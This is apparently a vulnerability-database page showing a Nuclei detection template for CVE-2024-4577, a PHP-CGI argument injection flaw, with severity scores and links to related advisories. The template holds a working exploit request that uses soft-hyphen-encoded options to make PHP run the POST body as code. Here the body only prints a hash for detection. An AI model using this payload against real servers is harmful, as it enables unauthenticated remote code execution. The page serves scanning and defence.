Lucene search
ProjectDiscoveryNUCLEI:CVE-2024-4577HistoryJun 07, 2024 - 3:28 p.m.
PHP CGI - Argument Injection
2024-06-0715:28:59
ProjectDiscovery
github.com
43
php
cgi
argument injection
cve-2024-4577
remote code execution
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.7 High
AI Score
Confidence
High
0.967 High
EPSS
Percentile
99.7%
PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.
id: CVE-2024-4577
info:
name: PHP CGI - Argument Injection
author: Hรผseyin TINTAล,sw0rk17,securityforeveryone,pdresearch
severity: critical
description: |
PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.
impact: |
Successful exploitation could lead to remote code execution on the affected system.
remediation: |
Apply the vendor-supplied patches or upgrade to a non-vulnerable version.
metadata:
verified: true
tags: cve,cve2024,php,cgi,rce
http:
- method: POST
path:
- "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
body: |
<?php echo md5("CVE-2024-4577"); ?>
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- "3f2ba4ab3b260f4c2dc61a6fac7c3e8a"
# digest: 4a0a004730450221008693eaa1040ef5b904550b0ec8d707667e4de37c2f03bcfb4cb631137ed90caf02203b9468a518628678b56886433cd50d65153bb54d66ac540ef0b535407471c01c:922c64590222798bb761d5b6d8e72950Related
githubexploit
githubexploit
Exploit for OS Command Injection in Php
2024-06-07 17:02:52
Exploit for OS Command Injection in Php
2024-06-08 12:23:35
Exploit for OS Command Injection in Php
2024-06-08 12:23:35
redhatcve
redhatcve
CVE-2024-4577
2024-06-11 14:26:19
attackerkb
attackerkb
CVE-2024-4577
2024-06-09 00:00:00
osv
osv
CGA-gvwm-h3qq-8679
2024-06-12 08:05:35
CVE-2024-4577
2024-06-09 20:15:09
CGA-84j3-w824-wv4x
2024-06-12 08:05:44
nessus
nessus
PHP-CGI Argument Injection CVE-2024-4577 (Direct Check)
2024-06-13 00:00:00
PHP 8.2.x < 8.2.20 Multiple Vulnerabilities
2024-06-10 00:00:00
nvd
nvd
CVE-2024-4577
2024-06-09 20:15:09
packetstorm
packetstorm
PHP CGI Argument Injection Remote Code Execution
2024-06-18 00:00:00
PHP Remote Code Execution
2024-06-14 00:00:00
alpinelinux
alpinelinux
CVE-2024-4577
2024-06-09 20:15:09
cvelist
cvelist
CVE-2024-4577 Argument Injection in PHP-CGI
2024-06-09 19:42:36
metasploit
metasploit
PHP CGI Argument Injection Remote Code Execution
2024-06-07 14:43:40
vulnrichment
vulnrichment
CVE-2024-4577 Argument Injection in PHP-CGI
2024-06-09 19:42:36
cbl_mariner
cbl_mariner
CVE-2024-4577 affecting package php for versions less than 8.1.29-1
2024-06-16 16:44:02
impervablog
impervablog
Imperva Protects Against Critical PHP Vulnerability CVE-2024-4577
2024-06-07 16:33:42
exploitdb
exploitdb
PHP < 8.3.8 - Remote Code Execution (Unauthenticated) (Windows)
2024-06-14 00:00:00
cve
cve
CVE-2024-4577
2024-06-09 20:15:09
ubuntucve
ubuntucve
CVE-2024-4577
2024-06-09 00:00:00
f5
f5
K000139953: PHP vulnerability CVE-2024-4577
2024-06-07 00:00:00
debiancve
debiancve
CVE-2024-4577
2024-06-09 20:15:09
hackread
hackread
TellYouThePass Ransomware Exploits Critical PHP Flaw, Patch NOW
2024-06-11 21:46:54
wizblog
wizblog
Critical RCE vulnerability in PHP CGI: everything you need to know
2024-06-10 17:08:03
wolfi
wolfi
CVE-2024-4577 vulnerabilities
2024-06-26 03:08:30
zdt
zdt
PHP < 8.3.8 - Unauthenticated Remote Code Execution (Windows) Exploit
2024-06-14 00:00:00
thn
thn
New PHP Vulnerability Exposes Windows Servers to Remote Code Execution
2024-06-08 07:35:00
cisa_kev
cisa_kev
PHP-CGI OS Command Injection Vulnerability
2024-06-12 00:00:00
hackerone
hackerone
rapid7blog
rapid7blog
Metasploit Weekly Wrap-Up 06/21/2024
2024-06-21 18:53:52
openvas
openvas
Slackware: Security Advisory (SSA:2024-158-01)
2024-06-07 00:00:00
PHP < 8.1.29, 8.2.x < 8.2.20, 8.3.x < 8.3.8 Multiple Vulnerabilities - Linux
2024-06-07 00:00:00
Fedora: Security Advisory for php (FEDORA-2024-49aba7b305)
2024-06-12 00:00:00
slackware
slackware
[slackware-security] php
2024-06-06 19:53:01
fedora
fedora
[SECURITY] Fedora 40 Update: php-8.3.8-1.fc40
2024-06-12 01:12:16
[SECURITY] Fedora 39 Update: php-8.2.20-1.fc39
2024-06-13 03:03:43
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.7 High
AI Score
Confidence
High
0.967 High
EPSS
Percentile
99.7%
Related for NUCLEI:CVE-2024-4577